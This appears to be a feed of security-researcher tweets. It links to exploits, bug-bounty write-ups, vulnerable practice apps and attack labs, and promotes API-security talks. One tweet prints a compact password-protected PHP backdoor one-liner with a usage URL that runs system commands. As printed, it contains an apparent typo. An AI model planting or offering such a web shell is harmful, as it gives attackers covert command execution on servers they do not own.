VMware vCenter 7.0.2.00100 unauth Arbitrary File Read + SSRF + Reflected XSS github.com/l0ggg/VMware_v…

To finish up 2021, I just published the write-up that I am nominating for the 2021 GCP VRP Prize. It is a written version of the Google Cloud SSRF bug I have previously made a YouTube video about. Game on! 😎 bugs.xdavidhu.me/google/2021/12…

Awesome tool github.com/pussycat0x/mal…

An Intentionally designed Vulnerable Android Application built in Kotlin for sharping your mobile hacking skills via exploiting real-world mobile vulnerabilities. github.com/optiv/Insecure… #android #hacking #cybsersecurity

<?=$_GET[p]==_&&$_GET[f]($GET_[c]) 35 bytes PHP backdoor protected by a password, supports arbitrary function calls. /backdoored.php?p=_&f=system&c=ls

CVE-2022-20699: Cisco Anyconnect VPN unauth RCE (rwx stack) it is not well checked. cc Flashback Team PoC github.com/Audiobahn/CVE-…

The results are in! We're proud to announce the Top 10 Web Hacking Techniques of 2021! portswigger.net/research/top-1…

I wrote a tool to quickly enrich a list of IPs with port/ vulnerability/ etc. information. Took around a minute to grab information for ~22,000 IPs: asciinema.org/a/9OZhQPzhSoNH…

For anyone interested, Hacking the Cloud now has a section for Capture the Flag projects! The first is, CI/CDon't, an AWS/GitLab CICD themed CTF. All you'd need is Terraform and an AWS account (it is deployed to your AWS account) hackingthe.cloud/aws/capture_th…

Bypassing SSL pinning on Android Flutter Apps with Ghidra link.medium.com/LvwxIY3UGob #flutter #android #sslpinning #cybersecurity #bugbounty

Like #APIs? If so, consider registering for the #ApiSecure'22 (virtual) and attend my + Vitthal Shinde🇮🇳's session - "Securing APIs with Open Standards - Tips for Making & Breaking APIs by the Synack Red Team" - Register Today - hopin.com/events/apisecu… #cybersecurity #devrel #openapi

📢We are excited to host Synack Red Team's Ryan Rutan 🌮 Ryan Rutan & Vitthal Shinde🇮🇳 Vitthal Shinde at APIsecure! Join us on April 6 & 7 and learn from their talk: "Securing APIs with Open Standards" Tickets are FREE! Click here 👉 ​bit.ly/3pIAYbx to register!

I am thrilled to announce📣 I will be giving a talk🗣 on “Securing APIs with Open Standards - Tips for Making & Breaking APIs” by the Synack Red Team with Ryan Rutan 🌮 Senior Director of Community at Synack At apidays Global Link to register : hopin.com/events/apisecu…

Join us at APIsecure on April 6 & 7 and learn from the roundtable with actual API Hackers! Vitthal Shinde Vitthal Shinde🇮🇳 Ozgur Alp Ozgur Alp Jeremiah Roe, Solutions Architect (DoD) at Synack Alissa Knight Alissa Knight Ryan Rutan Ryan Rutan 🌮 👉 ​bit.ly/3pIAYbx

I am thrilled to announce📣 My friend Vitthal Shinde🇮🇳 be giving a talk🗣 on “Securing APIs with Open Standards - Tips for Making & Breaking APIs” by the Synack Red Team with Ryan Rutan 🌮 Senior Director of Community at Synack At apidays Global Link : hopin.com/events/apisecu…

Register & Don’t miss the talk

Featuring #SynackRedTeam Vitthal Shinde🇮🇳 👨‍💻💻 Click here for more details: syn.ac/3DM0i6a #APIsecure #APIsecurecon #synack #synackredteam #synackcommunity

[Blog Post] Personal Access Token Disclosure in asana's Desktop Application for macOS enabled access to internal workspaces and projects Severity: P1 Blog-Post: security.lauritz-holtmann.de/advisories/asa… Bugcrowd-Report: bugcrowd.com/submissions/73…

mayfly277.github.io/posts/GOADv2/ Second version of Game Of Active directory github.com/Orange-Cyberde… Multi domains and multi forest lab to practice AD attacks. bit.ly/3AzEY46